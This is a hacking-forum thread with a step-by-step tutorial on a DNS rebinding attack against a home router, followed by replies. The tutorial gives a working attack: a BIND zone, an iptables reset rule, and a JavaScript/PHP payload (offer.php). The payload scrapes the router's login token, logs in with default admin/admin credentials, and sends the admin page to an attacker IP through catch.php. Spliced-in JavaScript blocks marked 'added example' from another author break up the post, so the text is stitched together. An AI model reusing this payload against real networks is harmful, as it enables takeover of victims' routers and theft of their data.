DNS Rebinding Attack
DNS Rebinding Attack #1
Hello
(I am too tired now... I will clean it up and resize the snapshots tomorrow)

This tutorial is dedicated to my friend @RootTheSystem

Note: this attack is not easy to orchestrate and implement. Even though it is an old attack, unfortunately not much has been done about it.

So with not much to say here, we start...

What is DNS?
The Domain Name System (DNS) is simply a system that receives a domain name, checks some tables and returns the IP address(es) of the machine (host) behind that domain according to those tables...

Example:
Code:
nslookup google.com
Server:        192.168.1.1
Address:    192.168.1.1#53

Non-authoritative answer:
Name:    google.com
Address: 213.139.49.96
Name:    google.com
Address: 213.139.49.123
Name:    google.com
Address: 213.139.49.89
Name:    google.com
Address: 213.139.49.109
Name:    google.com
Address: 213.139.49.82
Name:    google.com
Address: 213.139.49.110
Name:    google.com
Address: 213.139.49.88
Name:    google.com
Address: 213.139.49.102
Name:    google.com
Address: 213.139.49.103
Name:    google.com
Address: 213.139.49.116
Name:    google.com
Address: 213.139.49.117
Name:    google.com
Address: 213.139.49.95

In the above example we query the name server (address 192.168.1.1, port 53) for google.com and receive the response shown. Naturally Google has many IP addresses, so if one server (machine) is down, the others back it up.

When the browser receives these IP addresses it caches them and picks one to connect to. If that address stops answering, it moves on to the next one in the list without issuing a new DNS query, and it still treats the connection as belonging to the same domain name. This failover from one cached address to another is what the attack below abuses: the attacker makes the browser "rebind" the name to a different address of the attacker's choosing. Simple?

The client (a browser, for example) first checks its own cache, as we said before. If there is no record for this domain name it asks the OS, which does the same thing: it checks its cache first (if it has one), and if nothing is found there it asks the name server (in my case 192.168.1.1... more about this later). The name server (the DNS server) does the same again (cache first, then ask another DNS server), and so on until someone gets you the answer. This is why ping (or any network tool) starts faster when you give it the IP address instead of the domain name (try it...).

OK, if you are on Windows you can view the DNS cache using the ipconfig command:
Code:
ipconfig /displaydns

On Linux it is different: a plain installation usually has no system-wide DNS cache, so if you want one you need to run a caching resolver such as nscd or dnsmasq... (not our topic)

To see the address of your DNS server, under Windows you can again use ipconfig command:
Code:
ipconfig /all


On Linux the name server is saved in /etc/resolv.conf and as I said, in my case it is: nameserver 192.168.1.1

In both OSes (Linux and Windows) there is also a hosts file (/etc/hosts on Linux, C:\Windows\System32\drivers\etc\hosts on Windows) that maps names to addresses and is consulted before any DNS server is asked.

The following image will hopefully give you an idea of what I am talking about:
[Image: DNS_in_the_real_world.svg]
[source: http://en.wikipedia.org/wiki/Domain_Name_System]

OK, all that is good, now what?

Although the list of DNS servers is long, I want to mention only two in this tutorial:
  • Bind9: a well known DNS server, which I will be using in this tutorial to serve the domain name.
  • Dnsmasq: a DNS and DHCP server, also very common, especially in routers and network devices; we won't be using this one, but I just want you to know about it.

So for now, all you need to know is that Bind9 is a DNS server used to serve domain names. I will not go into details about DNS in this tutorial, as I am writing another one that will cover the subject with a small yet useful guide to Bind9.

OK, let's talk about the scenario I am after... As you may already know, home routers usually have a web-based GUI for administration that you open in a browser, usually at http://192.168.1.1/ where 192.168.1.1 is the default gateway. Use ipconfig on Windows to find the gateway; on Linux you can just issue the "route" command, and the default gateway is the address on the line that says default:
Code:
root@Kali:~# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0
192.168.1.0     *               255.255.255.0   U     0      0        0 wlan0

OK, so what is the big deal about this?
Well... normally you can access the router from the LAN (Local Area Network), but you can't access it from the Internet (WAN), because the firewall in the router blocks the connection (usually this is configurable, but let's assume that in my case it is not!). My goal is to access this page from the Internet!

The following snapshot shows the scan result, the IP is a dynamic public IP (not valid anymore):
[Image: wkf8aCz.png]

As you can see, port 80 is filtered (by the firewall) and 8080 is closed (nothing is listening).

So... How am I going to do that?
Well, to answer that question, we'll have to see what we already have:
  • A router with GUI, that we can access from the default gateway address (192.168.1.1)
  • Default username and password (I will tell you how I got this info shortly)
  • IP address of the victim (more about this later)

OK, in Jordan (where I live) we have only a few ISPs (Internet Service Providers), and it is easy to figure out which brands/devices they hand out as home routers; with a little searching you can find the default username and password of almost any device on the Internet!

About the IP address of the victim: in my case the victim is my brother (who also lives in Jordan), but in a real attack I would send the victim an email with a link... I think you know the rest!

OK, so what can we do with all that info? The answer is... more than you can ever imagine!

DNS Rebinding Attack

DNS rebinding is an attack that mainly targets web browsers. It was first described in 1996, when it affected the Java Virtual Machine.

Firefox did something to avoid this attack (thank you Firefox team); in fact I was talking about this with @Anima Templi the other day on the IRC channel. I thought that Firefox had a bug because the attack didn't work, but when I investigated the error more, I found that it was not a bug but a security feature! So... well done Firefox.

OK... Chrome, let's use that (without comments).

To understand how this attack works I have to explain one thing first, the Same-Origin Policy.

Let's check out this code (HTML):
[Image: onhzjEw.png]

This page needs to get two resources, one from http://google.com/ and the other from the same origin. An origin is the combination of:
  • the scheme (http)
  • the host name (the name in the URL, not the IP address it currently resolves to)
  • the port number (80)

OK, the result will look like this (I am running Chrome + "inspect element" tool):
[Image: KhU6LIM.png]

As we can see, the first request was blocked and nothing is returned, while the second request was processed successfully, because it respected the Same-Origin Policy. The policy says that a script may only read responses (for example through XMLHttpRequest) from resources that have the same origin as the page itself. It does not stop the page from loading or submitting to another origin, it only stops it from reading the reply, so these cross-origin requests still go out:
  • Form post: <form action="http://different-origin/resource.rc" method="post">
  • Script: <script src="http://different-origin/resource.js"></script>
  • CSS: <link rel="stylesheet" type="text/css" href="http://different-origin/style.css">

We will be using that in our attack ... so please remember all this.
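To make the origin rule concrete, here is an added example (my own code, not part of the original post) of how a browser compares two URLs: only scheme, host name and port are looked at, with the default port normalised. The host names ligeti.com and 192.168.1.1 are taken from the post; the paths are made up for illustration.

```javascript
// Added example: origin comparison as the Same-Origin Policy performs it.
// The IP address a name resolves to never enters the comparison, which is the
// gap DNS rebinding exploits. Uses only Node's built-in WHATWG URL class.

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Serialised origin "scheme://host:port", normalising the default port the way
// browsers do (http://a/ and http://a:80/ are one origin).
function originOf(urlString) {
  const u = new URL(urlString);
  if (!(u.protocol in DEFAULT_PORTS)) {
    throw new Error("only http(s) origins are handled here: " + u.protocol);
  }
  const port = u.port === "" ? DEFAULT_PORTS[u.protocol] : u.port;
  return u.protocol + "//" + u.hostname.toLowerCase() + ":" + port;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// What the policy lets a page at pageUrl do with resourceUrl:
//   "read"  - same origin: XMLHttpRequest may read the response body
//   "embed" - cross origin: the page may still load it via <script>, <link>,
//             <img> or submit a <form> to it, but cannot read the response
function sopVerdict(pageUrl, resourceUrl) {
  return sameOrigin(pageUrl, resourceUrl) ? "read" : "embed";
}

// Worked cases (illustrative paths on the post's host names).
const page = "http://ligeti.com/offer.php";
console.log(sopVerdict(page, "http://ligeti.com:80/template.gch")); // read
console.log(sopVerdict(page, "http://google.com/"));                 // embed
console.log(sopVerdict(page, "https://ligeti.com/template.gch"));    // embed (scheme differs)
console.log(sopVerdict(page, "http://192.168.1.1/template.gch"));    // embed
// After the rebind the browser fetches http://ligeti.com/template.gch from
// 192.168.1.1 and still says "read": the check never looked at the address.
```

The last two lines are the whole point: a request to the router by its IP address is cross-origin and unreadable, but the same router page fetched under the name ligeti.com is same-origin, because the browser keyed the origin on the name it was given.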

The Attack

How the attack works:
  • The victim visits the domain (via a link sent by email, posted on a forum... etc.).
  • Our DNS server answers with two IP addresses for the domain name: the first is the address of our website (web server) and the second is the address of the target device on the LAN (192.168.1.1). The order is important!!!
  • The victim's browser connects to the first address, loads the page and runs the JavaScript that drives the attack: the script keeps requesting a resource from its own origin. This resource is the page we want from the router's GUI and it does NOT exist on the web server (the request produces an error).
  • We spot the victim in the web server logs and block its requests with the firewall on the web server: iptables -A INPUT -s <victim ip address> -p tcp --dport 80 -j REJECT --reject-with tcp-reset
  • The browser still has both addresses cached ("pinned"), so when the connection to the first address is reset it fails over to the second one (the rebind). It keeps showing the original web page because that page is cached, but the page's requests now reach the router, and the browser treats them as same-origin because the host name has not changed.
  • The page receives the resource (the router's GUI page) and hands it to us (the attacker) by sending it to a different port or IP address that is not blocked.

So to do all that we need:
  • A DNS server to register a domain name (I will use Bind9)
  • A web server (I will use Apache)
  • The page + payload!
  • A victim (my brother)
  • A target: which is basically any device or resource connected to the LAN

OK... a little about JavaScript:
  • We will use XMLHttpRequest (part of Ajax) to request the resource periodically (with a timer).
  • Once the resource (the page) is available we can send it to ourselves. A plain XMLHttpRequest cannot do that, because by then our server is a different origin, but JSONP can: it is just a <script> tag whose src points at the other origin with the data in the URL, and script inclusion is exempt from the Same-Origin Policy.
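The steps above are easier to follow as a timeline, so here is an added in-memory model (my own code, not the post's) of the client behaviour the attack relies on. The "browser" keeps every A record it was given, pins the first address that answers, and only moves to the next one when a connection is reset. The addresses and host name are the post's, the page contents are constructed, and no real network is used.

```javascript
// Added example: model of DNS pinning + failover that the attack abuses.

// Answer order as served by the zone with rrset-order { order fixed; }.
const ANSWERS = { "ligeti.com": ["92.253.72.62", "192.168.1.1"] };

// Constructed "network": each address either answers HTTP or resets the TCP
// connection, which is what "REJECT --reject-with tcp-reset" produces.
function makeNetwork() {
  const state = { attackerFirewallOn: false };
  const hosts = {
    "92.253.72.62": (path) => {
      if (state.attackerFirewallOn) return { rst: true };
      return { status: path === "/offer.php" ? 200 : 403, body: "" };
    },
    "192.168.1.1": (path) =>
      path === "/template.gch"
        ? { status: 200, body: "<html>router admin template</html>" }
        : { status: 200, body: 'getObj("Frm_Logintoken").value = "15";' },
  };
  return { state, connect: (ip, path) => hosts[ip](path) };
}

// Minimal browser model: cached answers per host plus the index it is pinned to.
function makeBrowser(net, answers) {
  const pinned = {}; // host -> index into answers[host]
  return {
    fetch(host, path) {
      const list = answers[host];
      let i = host in pinned ? pinned[host] : 0;
      while (i < list.length) {
        const r = net.connect(list[i], path);
        if (!r.rst) {
          pinned[host] = i;
          return { ip: list[i], status: r.status, body: r.body };
        }
        i += 1; // connection reset: fall over to the next cached address
      }
      throw new Error("all addresses for " + host + " refused the connection");
    },
    pinnedAddress(host) {
      return host in pinned ? answers[host][pinned[host]] : null;
    },
  };
}

// Replays the timeline from the post and returns what each step observed.
function runScenario() {
  const net = makeNetwork();
  const browser = makeBrowser(net, ANSWERS);
  const log = [];
  log.push(browser.fetch("ligeti.com", "/offer.php").ip); // page load, from the attacker
  log.push(browser.fetch("ligeti.com", "/").status);       // polling: 403 from the attacker
  net.state.attackerFirewallOn = true;                     // attacker inserts the RST rule
  const r = browser.fetch("ligeti.com", "/");              // same host name, new address
  log.push(r.ip);
  log.push(/Frm_Logintoken/.test(r.body));                 // router login page is now readable
  return { log: log, pinned: browser.pinnedAddress("ligeti.com") };
}

// Why the record order matters: with the router first, the victim is served the
// router's login page instead of offer.php and the payload never runs.
function wrongOrderFirstHit() {
  const net = makeNetwork();
  const browser = makeBrowser(net, { "ligeti.com": ["192.168.1.1", "92.253.72.62"] });
  return browser.fetch("ligeti.com", "/offer.php").ip;
}

console.log(runScenario());        // { log: [ '92.253.72.62', 403, '192.168.1.1', true ], pinned: '192.168.1.1' }
console.log(wrongOrderFirstHit()); // 192.168.1.1
```

Note that once the browser has failed over, it stays pinned to 192.168.1.1 for ligeti.com; that is why the post has to ship the stolen page to the web server by IP address rather than by name.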

The following is a snapshot of Wireshark capturing the authentication process of the router (I have the same router and I tested that locally), by the way the router is ZTE family... check my other tutorial about how to hack into this router via telnet!
[Image: dERGUjg.png]

Note: the username is admin and the password is also admin, which is clearly the default. Frm_Logintoken is a token generated by the router; it basically increments by one on each successful login. I used a regular expression to scrape this value.

I also noticed that the page I want (my target) is requested later (file name template.gch). The .gch extension is also what GCC uses for precompiled headers, but that is unrelated here: it is simply the extension this router's web interface uses for its pages.

OK, so I installed CentOS (Linux) on VirtualBox, configured the network, installed both Bind9 and Apache, and flushed iptables/the firewall (I know it is stupid but... fast). Then on my router I configured this server as the DMZ host (all incoming connections from the Internet are redirected to this host/IP address)...

To get my public IP address I had to use a little script, as I don't have anything graphical on that server (I use the CentOS minimal installation). This is the script (very simple, Python 3):
Code:
import urllib.request

# Ask an external echo service which public address this host appears from.
with urllib.request.urlopen("http://echoip.com") as resp:
    myIP = resp.read().decode().strip()
print(myIP)

Result: 92.253.72.62

Note: all the IP addresses are real, but they are dynamic and renewed once a day I think, or every 12 hours (I didn't check and I don't care), so please don't try to be funny and scan them, as they are not mine any more! If you want a server to hack, contact me on the IRC channel and I will give you access to my sandbox!

OK, let's configure Bind9:
Code:
[root@localhost ~]# cat /etc/named.conf
//
// named.conf
//
// Provided by Red Hat bind package to configure the ISC BIND named(8) DNS
// server as a caching only nameserver (as a localhost DNS resolver only).
//
// See /usr/share/doc/bind*/sample/ for example named configuration files.
//

options {
    //listen-on port 53 { 127.0.0.1; };
    listen-on-v6 port 53 { ::1; };
    directory     "/var/named";
    dump-file     "/var/named/data/cache_dump.db";
        statistics-file "/var/named/data/named_stats.txt";
        memstatistics-file "/var/named/data/named_mem_stats.txt";
    allow-query     { any; };
    recursion yes;
    rrset-order {order fixed;};
    dnssec-enable yes;
    dnssec-validation yes;
    dnssec-lookaside auto;
    forwarders { 192.168.1.1; };
    /* Path to ISC DLV key */
    bindkeys-file "/etc/named.iscdlv.key";
    managed-keys-directory "/var/named/dynamic";
};

logging {
        channel default_debug {
                file "data/named.run";
                severity dynamic;
        };
};

zone "." IN {
    type hint;
    file "named.ca";
};

zone "ligeti.com" IN {
    type master;
    file "ligeti.com.zone";
    allow-update { none; };
};

include "/etc/named.rfc1912.zones";
include "/etc/named.root.key";

Notes:
  • allow-query { any; }; // allows queries from anywhere
  • recursion yes; // makes the server recursive, so the victim can still use it to resolve other websites without being blocked. Together with the previous line this is an open resolver, so do not leave it exposed any longer than the test needs.
  • forwarders { 192.168.1.1; }; // if the domain name is not served by this server, forward the query to this IP
  • rrset-order { order fixed; }; // the most important line: this forces Bind9 to return the IP addresses in the order they appear in the zone file, and the order is VERY important in this attack. Note that fixed is only honoured when BIND was built with --enable-fixed-rrset; otherwise the order is not guaranteed, so check it with a few dig queries before relying on it.
  • The listen-on line is commented out, so named listens on every interface rather than only on 127.0.0.1.
  • I added the zone "ligeti.com", which is the domain I am going to use in the attack.

And here is the configuration for ligeti.com zone (domain name):
Code:
[root@localhost ~]# cat /var/named/ligeti.com.zone
$TTL 86400
@   IN  SOA     ns1.ligeti.com. root.ligeti.com. (
        2013042201  ;Serial
        3600        ;Refresh
        1800        ;Retry
        604800      ;Expire
        86400       ;Minimum TTL
)
; Specify our two nameservers
        IN    NS        ns1.ligeti.com.
; Resolve nameserver hostnames to IP.
ns1        IN    A        92.253.72.62

; Define hostname -> IP pairs
@        IN    A        92.253.72.62
        IN    A        192.168.1.1

As you can see, at the end we add both IPs: the first address is the web server and the second is the IP address of our target (the router).

On the victim's machine I had to configure the router manually to use my DNS server as the default server, because I didn't register mine publicly (long story), but the effect is the same... anyway, this is how the network configuration of the victim looks:
[Image: VJsDTlJ.png]

So if my brother tries to access ligeti.com he will see my web server (403 error: "forbidden", as I don't have an index.php as the default page... anyway).

The page that carries the attack payload is offer.php, and here is how it looks in my brother's browser.
[Image: aflRTUG.png]

As you can see in the console window, the page is requesting a resource from http://ligeti.com/ all the time and getting the 403 error (forbidden), and I can see his IP address in the logs (/var/log/httpd/access_log).

Now let's see what happens when I block port 80:
Code:
iptables -A INPUT -s 213.186.188.181 -p tcp --dport 80 -j REJECT --reject-with tcp-reset

At that moment the victim's browser rebinds immediately and starts sending the requests to the other IP address (192.168.1.1). To make the effect obvious I decided to pop up an alert("hacked");
[Image: oBeBJrW.png]

Because I have only one server, I need to send the response back to that same server, but how, if I am blocking port 80? I have many options (such as using a different port), but I did something more primitive: I flushed iptables, so the page can connect to my web server again (before pressing OK), and in the console we can see the page sending the data back to the server in a GET request.
[Image: dmeYHkz.png]

The result:
[Image: Boeexvx.png]

Done...!!!

Here is the full code (fast and very dirty; the page is served as offer.php):
Code:
<?php
    // Cache this page for a long time, so the browser keeps showing it
    // after ligeti.com has been rebound to the router's address.
    header("Cache-Control: max-age=2592000");
    header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
?>
<html>
    <head>
    </head>
    <body>
        <h1>This is a sticky page...</h1>
        <script>
            // The router's login page embeds its token in an inline script:
            //   getObj("Frm_Logintoken").value = "15";
            // Capture the value so it can be replayed in the login POST.
            var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/;
            // Poll ligeti.com every 5 seconds; while the name still points at
            // the web server this only produces 403s in the console.
            var timer = setInterval(function(){ info(); }, 5000);

            function info()
            {
                // Synchronous XHR to the page's own origin. Once the firewall
                // resets connections to the web server, the browser fails over
                // to 192.168.1.1 and this very same request reaches the router.
                var xhr = new XMLHttpRequest();
                xhr.open("GET", "http://ligeti.com/", false);
                xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                xhr.send();

                var result = pattern.exec(xhr.responseText);
                //alert (xhr.responseText);

                if (result != null && result.length > 1)
                {
                    // Log in with the default credentials and the scraped token.
                    var login = new XMLHttpRequest();
                    var param = "frashnum=&action=login&Frm_Logintoken=" + result[1] +
                                "&Username=admin&Password=admin";
                    //console.log(result[1]);
                    login.open("POST", "http://ligeti.com/", false);
                    login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                    login.send(param);
                    //console.log(login.responseText);
                    clearInterval(timer);

                    // Now fetch the page we are after from the router's GUI.
                    var template = new XMLHttpRequest();
                    template.open("GET", "http://ligeti.com/template.gch", false);
                    template.send();
                    //console.log(template.responseText);
                    alert("Hacked");
                    sendResults(template.responseText);
                }
            }

            function sendResults(data)
            {
                // Script inclusion is exempt from the Same-Origin Policy, so the
                // stolen page can be shipped to the web server by IP address
                // (the name is now pinned to the router) as a JSONP-style GET.
                alert("Sending Data");
                myCallback = function(data){ console.log(data); };
                var script = document.createElement('script');
                script.type = 'text/javascript';
                console.log(data);
                // encodeURIComponent, not encodeURI: the page contains '&' and
                // '=', which encodeURI leaves unescaped and which would truncate
                // the secret parameter on the server side.
                script.src = 'http://92.253.72.62/catch.php?secret=' +
                             encodeURIComponent(data) + '&callback=myCallback';
                document.head.appendChild(script);
            }
            info();
        </script>
    </body>
</html>

The code to capture the results (simple and dumb; this is catch.php on the web server):
Code:
<?php
    // Dump whatever the payload sent in ?secret= to a file for inspection.
    // The response is not valid JavaScript (the callback parameter is ignored),
    // so the victim's console shows a syntax error, but by then the data has
    // already arrived in the request URL.
    $file = '/tmp/secret.html';
    $que = $_GET["secret"];
    file_put_contents($file, $que);
    echo $que;
?>

OK, what is missing (future work):
  • I need to encode the data (the results) properly before sending it to the server!
  • I need to split the data into multiple chunks (pieces) and/or compress it.
  • I need to make a tunnel (using JavaScript) to gain more control!
  • I need to clean up the code.


Conclusion
Well... just try to stay away from JavaScript (use NoScript or a similar plugin in other browsers), be aware of default usernames/passwords (change them!), and finally make sure that your browser is patched and up to date!
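One defence the conclusion does not mention, but which the Dnsmasq mentioned earlier implements, is to have the resolver refuse answers that point a public name into private address space (dnsmasq's --stop-dns-rebind option, with --rebind-domain-ok for your own LAN zone). Here is that check written out as an added example (my own code, not dnsmasq's and not from the post); the answer records mirror the ligeti.com zone above and are constructed for the example.

```javascript
// Added example: resolver-side rebinding filter. An A record for a name outside
// the listed local domains that resolves into private, loopback, link-local or
// shared address space is dropped before it can reach a browser.

const BLOCKED_RANGES = [
  "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
  "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
];

// Dotted quad -> unsigned 32-bit integer; rejects anything that is not a
// well-formed IPv4 address so a malformed record cannot slip past the check.
function ipv4ToInt(ip) {
  const parts = ip.split(".");
  if (parts.length !== 4) throw new Error("bad IPv4: " + ip);
  return parts.reduce((acc, p) => {
    const n = Number(p);
    if (!Number.isInteger(n) || n < 0 || n > 255 || p !== String(n)) {
      throw new Error("bad IPv4: " + ip);
    }
    return acc * 256 + n;
  }, 0);
}

function inCidr(ip, cidr) {
  const [net, bitsStr] = cidr.split("/");
  const bits = Number(bitsStr);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
}

function isRebindTarget(ip) {
  return BLOCKED_RANGES.some((c) => inCidr(ip, c));
}

// answers: [{name, type, data}]; localDomains: zones that may legitimately map
// to private space. Returns the surviving records and the dropped ones, so the
// caller can log the latter as a rebinding indicator.
function filterRebind(answers, localDomains = []) {
  const kept = [], dropped = [];
  for (const rr of answers) {
    const local = localDomains.some((d) => rr.name === d || rr.name.endsWith("." + d));
    if (rr.type === "A" && !local && isRebindTarget(rr.data)) dropped.push(rr);
    else kept.push(rr);
  }
  return { kept, dropped };
}

// Constructed answer set, mirroring the ligeti.com zone in the post.
const ANSWER = [
  { name: "ligeti.com", type: "A", data: "92.253.72.62" },
  { name: "ligeti.com", type: "A", data: "192.168.1.1" },
];
console.log(filterRebind(ANSWER)); // keeps 92.253.72.62, drops 192.168.1.1
```

Two caveats. First, this only helps when the filter sits on the victim's side of the path (the home router or a local dnsmasq); in the post the victim's router was pointed at the attacker's own BIND, which will obviously not filter anything. Second, it does nothing for the other half of the problem, the router accepting admin/admin, so change the default credentials regardless.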

The following video shows you how bad this attack can be.


Please leave your comments, questions, suggestions... anything you want to say!

Thank You!
Ligeti
(This post was last modified: 07-10-2014, 03:04 AM by Arkobee.)


RE: DNS Rebinding Attack #2
I'm honored... Thanks for writing such a great tutorial. I'll need to research this attack more, and I also have a few questions for you, but I can ask them on IRC. No need to overcrowd here.
Thanks again!
Fuck You.


RE: DNS Rebinding Attack #3
(07-10-2014, 11:41 AM)Boomslang Wrote: I'm honored... Thanks for writing such a great tutorial. I'll need to research this attack more, and I also have a few questions for you, but I can ask them on IRC. No need to overcrowd here.
Thanks again!


Can we have a video of this? Because I am kind of lost and stuck on the login token part!

Whatever I do, it's the same response from curl...

curl "http://192.168.1.1/" --data "frashnum=^&action=login^&Frm_Logintoken=15^&Username=admin^&Password=admin"


RE: DNS Rebinding Attack #4
@Boomslang ..


RE: DNS Rebinding Attack #5
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang ..

This is a very old thread. Why even bother posting in it?
My IT skills that I know perfect is SQL, HTML ,css ,wordpress, PHP.
coding skills that I know is Java, JavaScript and C#


RE: DNS Rebinding Attack #6
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang ..

This is a very old thread. Why even bother posting in it?

I don't know...
I want to get it done...
But I am stuck at setting up the server and adding new commands to the page, although I already have the commands...
The steps aren't clear enough.
And I want to bind the attack to an evil twin.


RE: DNS Rebinding Attack #7
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang ..

This is a very old thread. Why even bother posting in it?

And I already did a post, but no one answered me:
https://sinister.ly/Thread-how-can-i-per...ocal-level

And on Reddit and many other sites too!


RE: DNS Rebinding Attack #8
(04-27-2019, 03:24 PM)mooooon Wrote:
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang ..

This is a very old thread. Why even bother posting in it?

And I already did a post, but no one answered me:
https://sinister.ly/Thread-how-can-i-per...ocal-level

And on Reddit and many other sites too!

Stop posting in this thread and go to your own and wait for an answer. This thread was made in 2014, aka 5 years ago, and the member who made this thread hasn't been on since 2016, aka 3 years ago. You're not going to get an answer no matter how much you beg, and gravedigging is against the rules.
(This post was last modified: 04-27-2019, 05:03 PM by Nyx.)


RE: DNS Rebinding Attack #9
(04-27-2019, 03:21 PM)mooooon Wrote:
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang ..

This is a very old thread. Why even bother posting in it?

I don't know...
I want to get it done...
But I am stuck at setting up the server and adding new commands to the page, although I already have the commands...
The steps aren't clear enough.
And I want to bind the attack to an evil twin.

Please read the forum rules at the link below!
https://sinister.ly/misc.php?action=help&hid=8


RE: DNS Rebinding Attack #10
(04-27-2019, 05:01 PM)Nyx Wrote:
(04-27-2019, 03:24 PM)mooooon Wrote:
(04-27-2019, 07:58 AM)darkninja1980 Wrote: This is a very old thread. Why even bother posting in it?

And I already did a post, but no one answered me:
https://sinister.ly/Thread-how-can-i-per...ocal-level

And on Reddit and many other sites too!

Stop posting in this thread and go to your own and wait for an answer. This thread was made in 2014, aka 5 years ago, and the member who made this thread hasn't been on since 2016, aka 3 years ago. You're not going to get an answer no matter how much you beg, and gravedigging is against the rules.

OK, that's fine.

